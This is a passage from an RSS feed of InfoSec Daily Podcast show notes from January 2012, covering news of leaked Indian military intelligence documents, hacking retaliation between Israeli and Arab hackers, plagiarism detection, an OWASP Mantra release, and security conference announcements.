<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of now we start sharing with all our brothers and followers information from the Indian Militaty (sic) Intelligence servers, so far we have discovered within the Indian Spy Programme (sic) source codes of a dozen software companies which have signed agreements with Indian TANCS programme (sic) and CBI.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ignoring the typing error, gaining access to Indian Military&rsquo;s Intelligence servers is pretty damning for the agency. The hack got covered since the hackers claimed to have access to Norton&rsquo;s source code. Earlier</span><a href="https://twitter.com/#%21/csoghoian/status/155524871009468416"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> today I came across</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> scans of a set of documents that are internal communications between the Indian Military. The documents claim the existence of a system known as RINOA SUR. While I did not find what SUR stands for but RINOA is RIM, NOkia and Apple. And this is where things start to get very interesting, according to the set of documents, the RINOA SUR platform was used to spy on</span><a href="http://www.uscc.gov/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> the USCC</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;the US-China Economic and Security Review Commission.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cgisecurity.com/2012/01/detecting-plagiarism-with-google-and-book-search.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cgisecurity.com/2012/01/detecting-plagiarism-with-google-and-book-search.html</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://attrition.org/errata/plagiarism/detecting_plagiarism.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://attrition.org/errata/plagiarism/detecting_plagiarism.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With the</span><a href="http://attrition.org/errata/plagiarism/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> recent rash of plagiarism exposure</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, one of the most frequent questions we get is &quot;how do you find plagiarism?&quot; Our methodology is home-grown and very simple. We assume that we are only catching some of it, and that our methodology causes us to miss some cases. Rather than read our layman views on the matter, we encourage you to read the</span><a href="http://journalism.nyu.edu/assets/PageSpecificFiles/Ethics/NYU-Journalism-Handbook-for-Students.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> NYU Ethics Handbook</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> written by Professor Adam Penenberg. The entire handbook is worth reading, but you can jump to section 9, &quot;Cardinal Sins&quot;, to read about plagiarism.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Before we get into the &quot;how&quot;, we want to address a second question and concern; what is plagiarism and how can I avoid it?</span></p>
<p>	<a href="http://en.wikipedia.org/wiki/Plagiarism"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Plagiarism</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;&nbsp;Plagiarism is defined in dictionaries as the &quot;wrongful appropriation,&quot; &quot;close imitation,&quot; or &quot;purloining and publication&quot; of another author&#39;s &quot;language, thoughts, ideas, or expressions,&quot; and the representation of them as one&#39;s own original work&#8230;</span><br />
	<a href="http://en.wikipedia.org/wiki/Copyright"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Copyright</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;A copyright is a set of exclusive rights granted by a state to the creator of an original work or their assignee for a limited period of time upon disclosure of the work. This includes the right to copy, distribute and adapt the work.</span><br />
	<a href="http://en.wikipedia.org/wiki/Copyright_infringement"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Copyright_infringement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;Copyright infringement is the unauthorized or prohibited use of works under copyright, infringing the copyright holder&#39;s exclusive rights, such as the right to reproduce or perform the copyrighted work, or to make derivative works.</span><br />
	<a href="http://en.wikipedia.org/wiki/Fair_use_doctrine"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Fair_use_doctrine</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;In United States copyright law, fair use is a doctrine that permits limited use of copyrighted material without acquiring permission from the rights holders. Examples of fair use include commentary, criticism, news reporting, research, teaching, library archiving and scholarship.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.vulnerabilitydatabase.com/2012/01/owasp-mantra-armada-v0-81-beta-released/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.vulnerabilitydatabase.com/2012/01/owasp-mantra-armada-v0-81-beta-released/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OWASP Mantra is such an innovative product, a security framework built on top of a browser. Its cross platform, portable and can run out of the box. You can take it with you where ever you go in absolutely any rewritable media including memory cards, flash drives and portable hard disks. More over, Mantra can be used for both offensive security and defensive security related tasks which makes it incredible.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here comes OWASP Mantra 0.81 Beta, codenamed Armada, based on Mozilla Firefox 9.0.1 and work out of the box with Linux, Windows and Macintosh.</span><img height="260px;" src="https://lh5.googleusercontent.com/yQg9Iu5WrDi0QbKPJxUIsf7UKvSDWJGx-8tkNEcfHGCOajlld4JjI-yn-UdCNb9jO2lcyAWE6c2RPbXBpXbP7Ck88pZy8Fb_PaqgDQXxTaJjgkwelh8" width="462px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">List of new features:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Addons</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Updated Base</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Galley Integration: It is a collection of links of online tools that can be helpful during penetration testing. Now you can access them right from the bookmarks.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Better Look and feel: FXChrome &ndash; Lite and takes less space</span></li>
</ul>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Download</span><a href="http://www.getmantra.com/download/mantra-security-toolkit/index.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> OWASP Mantra Armada v0.81 Beta</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Project Page: </span><a href="https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3352/0/infosec-daily-podcast-episode-564.mp3" length="23656216" type="audio/mpeg" />
		<itunes:duration>0:49:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	On &#160;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &#160;Go to http://twtpoll.com/jlknm0 to take the poll.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894
Israeli hackers decided this past weekend to retaliate in an unorganized fashion: On an Israeli hacking forum, personal details were revealed (including phone numbers) of users from an Arab website that was hacked by an Israeli. Another column on the screen that was hidden could have been credit card details of the users. In addition, a number of other Arab sites were hacked into over the weekend, apparently by Israelis.
	In the meantime, Arab hackers have published a list of Israeli sites t[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 563 &#8211; Interview with Chris Hadnagy (@humanhacker)</title>
		<link>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker</link>
		<comments>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker#comments</comments>
		<pubDate>Tue, 10 Jan 2012 02:24:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3348</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 563 for January 9, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On &nbsp;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &nbsp;Go to </span><a href="http://twtpoll.com/jlknm0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://twtpoll.com/jlknm0</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to take the poll.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012 <br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012 <br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
